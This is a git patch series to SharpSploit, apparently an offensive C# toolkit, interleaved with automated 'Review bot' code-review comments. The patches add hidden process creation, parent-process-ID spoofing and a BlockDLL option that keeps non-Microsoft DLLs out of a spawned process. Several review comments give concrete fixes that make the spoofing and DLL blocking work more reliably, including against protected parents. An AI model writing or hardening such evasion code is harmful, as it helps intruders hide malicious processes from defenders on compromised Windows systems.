From 3d7cdadd29c46cd04bda45f33e0600fb2d77dd50 Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 23 Sep 2020 17:24:52 +0200 Subject: [PATCH 1/7] Add createProcess, CreateProcessPInvoke, CreateProcessPInvokePPID --- SharpSploit/Credentials/Tokens.cs | 5 +- SharpSploit/Execution/PlatformInvoke/Win32.cs | 46 ++++++++- SharpSploit/Execution/Shell.cs | 98 +++++++++++++++++++ SharpSploit/Execution/Win32.cs | 6 +- 4 files changed, 149 insertions(+), 6 deletions(-) diff --git a/SharpSploit/Credentials/Tokens.cs b/SharpSploit/Credentials/Tokens.cs index 48b12dd..e41019a 100644 --- a/SharpSploit/Credentials/Tokens.cs +++ b/SharpSploit/Credentials/Tokens.cs @@ -248,11 +248,14 @@ public bool BypassUAC(string Binary = "cmd.exe", string Arguments = "", string P continue; } + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_DEFAULT_ERROR_MODE; + + Win32.ProcessThreadsAPI._STARTUPINFO startupInfo = new Win32.ProcessThreadsAPI._STARTUPINFO(); startupInfo.cb = (UInt32)Marshal.SizeOf(typeof(Win32.ProcessThreadsAPI._STARTUPINFO)); Win32.ProcessThreadsAPI._PROCESS_INFORMATION processInformation = new Win32.ProcessThreadsAPI._PROCESS_INFORMATION(); if (!PInvoke.Win32.Advapi32.CreateProcessWithLogonW(Environment.UserName, Environment.UserDomainName, "password", - 0x00000002, Path + Binary, Path + Binary + " " + Arguments, 0x04000000, IntPtr.Zero, Path, ref startupInfo, out processInformation)) + 0x00000002, Path + Binary, Path + Binary + " " + Arguments, flags, IntPtr.Zero, Path, ref startupInfo, out processInformation)) { Console.Error.WriteLine("CreateProcessWithLogonW() Error: " + new Win32Exception(Marshal.GetLastWin32Error()).Message); continue; diff --git a/SharpSploit/Execution/PlatformInvoke/Win32.cs b/SharpSploit/Execution/PlatformInvoke/Win32.cs index 78501c8..47e3347 100644 --- a/SharpSploit/Execution/PlatformInvoke/Win32.cs +++ b/SharpSploit/Execution/PlatformInvoke/Win32.cs 
@@ -177,6 +177,32 @@ IntPtr hProcess public static extern void GetNativeSystemInfo( ref Execute.Win32.Kernel32.SYSTEM_INFO lpSystemInfo ); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern bool InitializeProcThreadAttributeList( + IntPtr lpAttributeList, + int dwAttributeCount, + int dwFlags, + ref IntPtr lpSize + ); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern bool UpdateProcThreadAttribute( + IntPtr lpAttributeList, + uint dwFlags, + IntPtr Attribute, + IntPtr lpValue, + IntPtr cbSize, + IntPtr lpPreviousValue, + IntPtr lpReturnSize + ); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern bool DeleteProcThreadAttributeList( + IntPtr lpAttributeList + ); + + } public static class User32 @@ -368,7 +394,7 @@ public static extern bool CreateProcessWithLogonW( int logonFlags, String applicationName, String commandLine, - int creationFlags, + Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, IntPtr environment, String currentDirectory, ref Execute.Win32.ProcessThreadsAPI._STARTUPINFO startupInfo, @@ -387,6 +413,22 @@ public static extern bool CreateProcessWithTokenW( ref Execute.Win32.ProcessThreadsAPI._STARTUPINFO lpStartupInfo, out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInfo ); + + + [DllImport("kernel32.dll")] + public static extern bool CreateProcess( + string lpApplicationName, + string lpCommandLine, + ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpProcessAttributes, + ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpThreadAttributes, + bool bInheritHandles, + Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, + IntPtr lpEnvironment, + string lpCurrentDirectory, + ref Execute.Win32.ProcessThreadsAPI._STARTUPINFOEX lpStartupInfoEx, + out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInformation + ); + [DllImport("advapi32.dll", SetLastError = true)] public static extern Boolean CredEnumerateW( 
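Review bot: The new `CreateProcess` binding at the end of this line's last hunk is declared with a bare `[DllImport("kernel32.dll")]`, without `SetLastError = true`, so any caller that reports failure through `Marshal.GetLastWin32Error()` — the pattern `BypassUAC` uses for `CreateProcessWithLogonW` in the Tokens.cs hunk — will read a stale error code. The `InitializeProcThreadAttributeList`, `UpdateProcThreadAttribute` and `DeleteProcThreadAttributeList` declarations added earlier in the same patch all set it, so this looks like an oversight rather than a choice. The binding also sits inside the `Advapi32` class while importing kernel32.dll; patch 2 of this series moves it to `Kernel32` but still never adds the attribute. Suggested declaration: `[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]`.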
@@ -531,7 +573,7 @@ public static extern Int32 RegQueryInfoKey( IntPtr lpSecurityDescriptor, IntPtr lpftLastWriteTime ); - + [DllImport("advapi32.dll", SetLastError = true)] public static extern Boolean RevertToSelf(); diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index b443d63..4c24f53 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs 
@@ -296,5 +296,103 @@ public static string CreateProcessWithToken(string Command, string Path, IntPtr } } } + + + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke(string targetProcess) + { + + Win32.ProcessThreadsAPI._STARTUPINFOEX StartupInfoEx = new Win32.ProcessThreadsAPI._STARTUPINFOEX(); + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + + StartupInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(StartupInfoEx); + IntPtr lpValue = IntPtr.Zero; + Win32.WinBase._SECURITY_ATTRIBUTES pSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); + Win32.WinBase._SECURITY_ATTRIBUTES tSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); + pSec.nLength = (uint)Marshal.SizeOf(pSec); + tSec.nLength = (uint)Marshal.SizeOf(tSec); + + StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; + + PInvoke.Win32.Advapi32.CreateProcess( + targetProcess, + null, + ref pSec, + ref tSec, + false, + flags, + IntPtr.Zero, + null, + ref StartupInfoEx, + out ProcInfo + ); + + return ProcInfo; + } + + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokePPID(string targetProcess, int parentProcessId) + { + + const int ProcThreadAttributeParentProcess = 0x00020000; + + Win32.ProcessThreadsAPI._STARTUPINFOEX StartupInfoEx = new Win32.ProcessThreadsAPI._STARTUPINFOEX(); + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + + StartupInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(StartupInfoEx); + IntPtr lpValue = IntPtr.Zero; + + try + { + + Win32.WinBase._SECURITY_ATTRIBUTES pSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); + Win32.WinBase._SECURITY_ATTRIBUTES tSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); + pSec.nLength = (uint)Marshal.SizeOf(pSec); + tSec.nLength = (uint)Marshal.SizeOf(tSec); + + StartupInfoEx.StartupInfo.dwFlags = 
(uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; + + IntPtr lpSize = IntPtr.Zero; + + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); + StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize); + + IntPtr parentHandle = Process.GetProcessById(parentProcessId).Handle; + lpValue = Marshal.AllocHGlobal(IntPtr.Size); + Marshal.WriteIntPtr(lpValue, parentHandle); + + PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)ProcThreadAttributeParentProcess, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); + PInvoke.Win32.Advapi32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo); + + return ProcInfo; + + } + finally + { + PInvoke.Win32.Kernel32.DeleteProcThreadAttributeList(StartupInfoEx.lpAttributeList); + Marshal.FreeHGlobal(StartupInfoEx.lpAttributeList); + Marshal.FreeHGlobal(lpValue); + } + } + + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION createProcessAsPInvoke(string path, string domain, string username, string password) + { + const int LogonWithProfile = 0x00000001; + + Win32.ProcessThreadsAPI._STARTUPINFO StartupInfo = new Win32.ProcessThreadsAPI._STARTUPINFO(); + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + + StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; + StartupInfo.wShowWindow = 0; //SW_HIDE + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED | Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; + + PInvoke.Win32.Advapi32.CreateProcessWithLogonW(username, domain, password, LogonWithProfile, 
path, "", flags, IntPtr.Zero, @"C:\Windows\System32", ref StartupInfo, out ProcInfo); + return ProcInfo; + } + + } } \ No newline at end of file diff --git a/SharpSploit/Execution/Win32.cs b/SharpSploit/Execution/Win32.cs index 8806a43..69f61c2 100644 --- a/SharpSploit/Execution/Win32.cs +++ b/SharpSploit/Execution/Win32.cs @@ -542,7 +542,7 @@ public struct _SYSTEM_INFO [StructLayout(LayoutKind.Sequential)] public struct _SECURITY_ATTRIBUTES { - UInt32 nLength; + public UInt32 nLength; IntPtr lpSecurityDescriptor; Boolean bInheritHandle; }; @@ -868,8 +868,8 @@ public struct _STARTUPINFO [StructLayout(LayoutKind.Sequential)] public struct _STARTUPINFOEX { - _STARTUPINFO StartupInfo; - // PPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; + public _STARTUPINFO StartupInfo; + public IntPtr lpAttributeList; }; //https://msdn.microsoft.com/en-us/library/windows/desktop/ms684873(v=vs.85).aspx From 9eb579451c63ab4e13a7df21d983f7d201cc223a Mon Sep 17 00:00:00 2001 From: salu90 Date: Thu, 24 Sep 2020 11:09:07 +0200 Subject: [PATCH 2/7] minor fixes --- SharpSploit/Credentials/Tokens.cs | 7 +-- SharpSploit/Execution/PlatformInvoke/Win32.cs | 33 ++++++------- SharpSploit/Execution/Shell.cs | 47 ++++++++++--------- 3 files changed, 41 insertions(+), 46 deletions(-) diff --git a/SharpSploit/Credentials/Tokens.cs b/SharpSploit/Credentials/Tokens.cs index e41019a..0cd195a 100644 --- a/SharpSploit/Credentials/Tokens.cs +++ b/SharpSploit/Credentials/Tokens.cs 
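Review bot: None of the three methods added to Shell.cs checks the BOOL returned by `CreateProcess` / `CreateProcessWithLogonW`, so on failure each returns a zero-filled PROCESS_INFORMATION that the caller cannot distinguish from success — `CreateProcessPInvokePPID` even frees its attribute list in `finally` and returns as if everything worked. Mirror the Tokens.cs convention: `if (!PInvoke.Win32.Advapi32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo)) throw new Win32Exception(Marshal.GetLastWin32Error());` (which needs `SetLastError = true` on the binding, absent in this patch, and `System.ComponentModel` in scope). The `hProcess`/`hThread` handles inside the returned structure are owned by the caller and nothing here closes them; a one-line doc remark would make that clear. In `CreateProcessPInvoke` the `lpValue` local is declared and never used, and unlike the PPID variant the method has no `try`/`finally`.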
@@ -248,14 +248,11 @@ public bool BypassUAC(string Binary = "cmd.exe", string Arguments = "", string P continue; } - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_DEFAULT_ERROR_MODE; - - Win32.ProcessThreadsAPI._STARTUPINFO startupInfo = new Win32.ProcessThreadsAPI._STARTUPINFO(); startupInfo.cb = (UInt32)Marshal.SizeOf(typeof(Win32.ProcessThreadsAPI._STARTUPINFO)); Win32.ProcessThreadsAPI._PROCESS_INFORMATION processInformation = new Win32.ProcessThreadsAPI._PROCESS_INFORMATION(); if (!PInvoke.Win32.Advapi32.CreateProcessWithLogonW(Environment.UserName, Environment.UserDomainName, "password", - 0x00000002, Path + Binary, Path + Binary + " " + Arguments, flags, IntPtr.Zero, Path, ref startupInfo, out processInformation)) + 0x00000002, Path + Binary, Path + Binary + " " + Arguments, 0x04000000, IntPtr.Zero, Path, ref startupInfo, out processInformation)) { Console.Error.WriteLine("CreateProcessWithLogonW() Error: " + new Win32Exception(Marshal.GetLastWin32Error()).Message); continue; @@ -657,4 +654,4 @@ public static string ConvertSidToName(IntPtr pSid) } } } -} +} \ No newline at end of file diff --git a/SharpSploit/Execution/PlatformInvoke/Win32.cs b/SharpSploit/Execution/PlatformInvoke/Win32.cs index 47e3347..5f08ec5 100644 --- a/SharpSploit/Execution/PlatformInvoke/Win32.cs +++ b/SharpSploit/Execution/PlatformInvoke/Win32.cs 
@@ -202,6 +202,19 @@ public static extern bool DeleteProcThreadAttributeList( IntPtr lpAttributeList ); + [DllImport("kernel32.dll")] + public static extern bool CreateProcess( + string lpApplicationName, + string lpCommandLine, + ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpProcessAttributes, + ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpThreadAttributes, + bool bInheritHandles, + Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, + IntPtr lpEnvironment, + string lpCurrentDirectory, + ref Execute.Win32.ProcessThreadsAPI._STARTUPINFOEX lpStartupInfoEx, + out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInformation + ); } @@ -394,7 +407,7 @@ public static extern bool CreateProcessWithLogonW( int logonFlags, String applicationName, String commandLine, - Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, + int creationFlags, IntPtr environment, String currentDirectory, ref Execute.Win32.ProcessThreadsAPI._STARTUPINFO startupInfo, @@ -413,23 +426,7 @@ public static extern bool CreateProcessWithTokenW( ref Execute.Win32.ProcessThreadsAPI._STARTUPINFO lpStartupInfo, out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInfo ); - - - [DllImport("kernel32.dll")] - public static extern bool CreateProcess( - string lpApplicationName, - string lpCommandLine, - ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpProcessAttributes, - ref Execute.Win32.WinBase._SECURITY_ATTRIBUTES lpThreadAttributes, - bool bInheritHandles, - Execute.Win32.Advapi32.CREATION_FLAGS dwCreationFlags, - IntPtr lpEnvironment, - string lpCurrentDirectory, - ref Execute.Win32.ProcessThreadsAPI._STARTUPINFOEX lpStartupInfoEx, - out Execute.Win32.ProcessThreadsAPI._PROCESS_INFORMATION lpProcessInformation - ); - - + [DllImport("advapi32.dll", SetLastError = true)] public static extern Boolean CredEnumerateW( String Filter, diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index 4c24f53..a345b3d 100644 
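Review bot: Moving `CreateProcess` into `Kernel32` fixes the DLL/class mismatch, but the declaration is still `[DllImport("kernel32.dll")]` with neither `SetLastError` nor `CharSet`, so it binds the ANSI `CreateProcessA` (default `CharSet.Ansi`) and `lpApplicationName`/`lpCommandLine` are marshalled as ANSI — a non-ASCII path would be mangled — while `Marshal.GetLastWin32Error()` stays unreliable for callers. The neighbouring `DeleteProcThreadAttributeList` import at the top of this hunk does set `SetLastError = true`. Suggest `[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]`, assuming `_STARTUPINFO`'s string members (not visible here) are marshalled consistently with that.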
--- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -296,8 +296,17 @@ public static string CreateProcessWithToken(string Command, string Path, IntPtr } } } - - + + + /// + /// Creates a process specified as argument using the Platform Invoke API. + /// + /// Simone Salucci (@saim1z) & Daniel López (@attl4s) + /// The target process to execute. + /// PROCESS_INFORMATION structure. + /// + /// Code has been kindly stolen and adapted from TikiTorch (https://github.com/rasta-mouse/TikiTorch/blob/064c60c5e23188867a0f9c5a0626dd39718750d4/TikiLoader/Generic.cs). + /// public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke(string targetProcess) { @@ -315,7 +324,7 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke( StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; - PInvoke.Win32.Advapi32.CreateProcess( + PInvoke.Win32.Kernel32.CreateProcess( targetProcess, null, ref pSec, @@ -331,6 +340,16 @@ out ProcInfo return ProcInfo; } + /// + /// Creates a process with the parent process ID specified as argument using the Platform Invoke API. + /// + /// Simone Salucci (@saim1z) & Daniel López (@attl4s) + /// The target process to execute. + /// The parent process ID of the new process executed. + /// PROCESS_INFORMATION structure. + /// + /// Code has been kindly stolen and adapted from TikiTorch (https://github.com/rasta-mouse/TikiTorch/blob/064c60c5e23188867a0f9c5a0626dd39718750d4/TikiLoader/Generic.cs). + /// public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokePPID(string targetProcess, int parentProcessId) { 
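Review bot: The new XML doc for `CreateProcessPInvoke` describes `targetProcess` as "The target process to execute", but the value is passed as `lpApplicationName` with a `null` `lpCommandLine`, so it has to be the path of an executable and cannot carry arguments; say so, e.g. `/// <param name="targetProcess">Path of the executable to launch; it is passed as lpApplicationName with no command line, so it cannot include arguments.</param>`. The `<returns>` text ("PROCESS_INFORMATION structure") should add that `hProcess`/`hThread` are owned by the caller and must be closed, and that the structure is zero-filled when `CreateProcess` fails because its return value is not checked. The same two points apply to the `CreateProcessPInvokePPID` doc added in the last hunk on this line.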
@@ -355,7 +374,6 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; IntPtr lpSize = IntPtr.Zero; - PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize); @@ -365,10 +383,9 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP Marshal.WriteIntPtr(lpValue, parentHandle); PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)ProcThreadAttributeParentProcess, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); - PInvoke.Win32.Advapi32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo); + PInvoke.Win32.Kernel32.CreateProcess(targetProcess, null, ref pSec, ref tSec, false, flags, IntPtr.Zero, null, ref StartupInfoEx, out ProcInfo); return ProcInfo; - } finally { 
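Review bot: `Process.GetProcessById(parentProcessId).Handle` opens the parent with whatever access `Process.Handle` requests — PROCESS_ALL_ACCESS on .NET Framework, as far as I recall — whereas PROC_THREAD_ATTRIBUTE_PARENT_PROCESS only needs PROCESS_CREATE_PROCESS, so spoofing a higher-integrity or protected parent fails needlessly, and the `Process` object is never disposed. If the library has an `OpenProcess` binding (not visible in this diff), open the parent with `PROCESS_CREATE_PROCESS` (0x0080) and close the handle after `CreateProcess` returns; otherwise at least keep the `Process` in a `using` that spans the `CreateProcess` call so the handle stays valid while it is in use. The `CreateProcess` return value is still unchecked in this hunk, so a failed spoof silently returns a zeroed PROCESS_INFORMATION.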
@@ -377,22 +394,6 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvokeP Marshal.FreeHGlobal(lpValue); } } - - public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION createProcessAsPInvoke(string path, string domain, string username, string password) - { - const int LogonWithProfile = 0x00000001; - - Win32.ProcessThreadsAPI._STARTUPINFO StartupInfo = new Win32.ProcessThreadsAPI._STARTUPINFO(); - Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; - - StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; - StartupInfo.wShowWindow = 0; //SW_HIDE - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_SUSPENDED | Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; - - PInvoke.Win32.Advapi32.CreateProcessWithLogonW(username, domain, password, LogonWithProfile, path, "", flags, IntPtr.Zero, @"C:\Windows\System32", ref StartupInfo, out ProcInfo); - return ProcInfo; - } - - + } } \ No newline at end of file From c0ba031fbbeb45defe43e4441049a521f78e50be Mon Sep 17 00:00:00 2001 From: salu90 Date: Thu, 24 Sep 2020 11:27:56 +0200 Subject: [PATCH 3/7] update Tokens.cs --- SharpSploit/Credentials/Tokens.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SharpSploit/Credentials/Tokens.cs b/SharpSploit/Credentials/Tokens.cs index 0cd195a..48b12dd 100644 --- a/SharpSploit/Credentials/Tokens.cs +++ b/SharpSploit/Credentials/Tokens.cs @@ -654,4 +654,4 @@ public static string ConvertSidToName(IntPtr pSid) } } } -} \ No newline at end of file +} From 03716a8abcf9313d260182e3809620c1e512e72d Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 30 Sep 2020 15:35:51 +0200 Subject: [PATCH 4/7] Add BlockDLL feature to CreateProcessPInvokePPID and CreateProcessPInvoke --- SharpSploit/Execution/Shell.cs | 44 +++++++++++++++++++++------------- SharpSploit/Execution/Win32.cs | 15 ++++++++++++ 2 files changed, 43 insertions(+), 16 deletions(-) 
diff --git a/SharpSploit/Execution/Shell.cs b/SharpSploit/Execution/Shell.cs index a345b3d..b58f182 100644 --- a/SharpSploit/Execution/Shell.cs +++ b/SharpSploit/Execution/Shell.cs @@ -297,7 +297,6 @@ public static string CreateProcessWithToken(string Command, string Path, IntPtr } } - /// /// Creates a process specified as argument using the Platform Invoke API. /// @@ -307,14 +306,14 @@ public static string CreateProcessWithToken(string Command, string Path, IntPtr /// /// Code has been kindly stolen and adapted from TikiTorch (https://github.com/rasta-mouse/TikiTorch/blob/064c60c5e23188867a0f9c5a0626dd39718750d4/TikiLoader/Generic.cs). /// - public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke(string targetProcess) + public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke(string targetProcess, bool blockDLL) { - Win32.ProcessThreadsAPI._STARTUPINFOEX StartupInfoEx = new Win32.ProcessThreadsAPI._STARTUPINFOEX(); - Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo; + Win32.ProcessThreadsAPI._PROCESS_INFORMATION ProcInfo = new Win32.ProcessThreadsAPI._PROCESS_INFORMATION(); StartupInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(StartupInfoEx); - IntPtr lpValue = IntPtr.Zero; + IntPtr lpValue = Marshal.AllocHGlobal(IntPtr.Size); + Win32.WinBase._SECURITY_ATTRIBUTES pSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); Win32.WinBase._SECURITY_ATTRIBUTES tSec = new Win32.WinBase._SECURITY_ATTRIBUTES(); pSec.nLength = (uint)Marshal.SizeOf(pSec); 
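Review bot: The new `blockDLL` parameter on `CreateProcessPInvoke` is not described in the XML doc directly above the signature, which still lists only `targetProcess`; add `/// <param name="blockDLL">When true, sets PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON on the child (the Microsoft-signed-only DLL loading mitigation).</param>`. As this is a public API, `bool blockDLL = false` would keep the existing one-argument call compiling. The `lpValue` buffer now allocated unconditionally with `Marshal.AllocHGlobal(IntPtr.Size)` at the end of this hunk has no matching `FreeHGlobal` anywhere in this method; the method body continues past the hunk.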
@@ -322,9 +321,19 @@ public static Win32.ProcessThreadsAPI._PROCESS_INFORMATION CreateProcessPInvoke( StartupInfoEx.StartupInfo.dwFlags = (uint)Win32.ProcessThreadsAPI.STARTF.STARTF_USESHOWWINDOW; StartupInfoEx.StartupInfo.wShowWindow = 0; //SW_HIDE - Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW; + Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW | Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT; - PInvoke.Win32.Kernel32.CreateProcess( + if (blockDLL) + { + IntPtr lpSize = IntPtr.Zero; + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); + StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); + PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize); + Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON)); + PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); + } + + PInvoke.Win32.Kernel32.CreateProcess( targetProcess, null, ref pSec, 
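Review bot: The `blockDLL` branch allocates an attribute list and writes into `lpValue`, but `CreateProcessPInvoke` has no `try`/`finally`, so neither `DeleteProcThreadAttributeList`/`FreeHGlobal(lpAttributeList)` nor `FreeHGlobal(lpValue)` is ever called — both leak on every call, and none of the three API results is checked. `new IntPtr((long)...ALWAYS_ON)` also throws OverflowException in a 32-bit process, because the policy is bit 44 of a DWORD64; the attribute needs an 8-byte buffer and `cbSize` 8, not `IntPtr.Size`, so the `AllocHGlobal(IntPtr.Size)` earlier in the method should become `AllocHGlobal(sizeof(long))`. I believe `CreateProcess` tolerates a null `lpAttributeList` with EXTENDED_STARTUPINFO_PRESENT when `blockDLL` is false, but OR-ing the flag in only when a list exists avoids depending on that. `Win32Exception` requires `System.ComponentModel`, which Tokens.cs imports; check Shell.cs's usings. The rest of the method (the `CreateProcess` call and return) lies outside this hunk.
```csharp
Win32.Advapi32.CREATION_FLAGS flags = Win32.Advapi32.CREATION_FLAGS.CREATE_NO_WINDOW;
try
{
    if (blockDLL)
    {
        flags |= Win32.Advapi32.CREATION_FLAGS.EXTENDED_STARTUPINFO_PRESENT;
        IntPtr lpSize = IntPtr.Zero;
        PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
        StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
        if (!PInvoke.Win32.Kernel32.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize))
            throw new Win32Exception(Marshal.GetLastWin32Error());
        // Policy is a DWORD64 (bit 44): write all 8 bytes so this also works in a 32-bit process.
        Marshal.WriteInt64(lpValue, (long)Win32.Advapi32.BINARY_SIGNATURE_POLICY.BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON);
        if (!PInvoke.Win32.Kernel32.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)Win32.Advapi32.PROCESS_THREAD_ATTRIBUTE.MITIGATION_POLICY, lpValue, (IntPtr)sizeof(long), IntPtr.Zero, IntPtr.Zero))
            throw new Win32Exception(Marshal.GetLastWin32Error());
    }
    // … unchanged: CreateProcess call (check its return value) and return ProcInfo …
}
finally
{
    if (StartupInfoEx.lpAttributeList != IntPtr.Zero)
    {
        PInvoke.Win32.Kernel32.DeleteProcThreadAttributeList(StartupInfoEx.lpAttributeList);
        Marshal.FreeHGlobal(StartupInfoEx.lpAttributeList);
    }
    Marshal.FreeHGlobal(lpValue);
}
```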
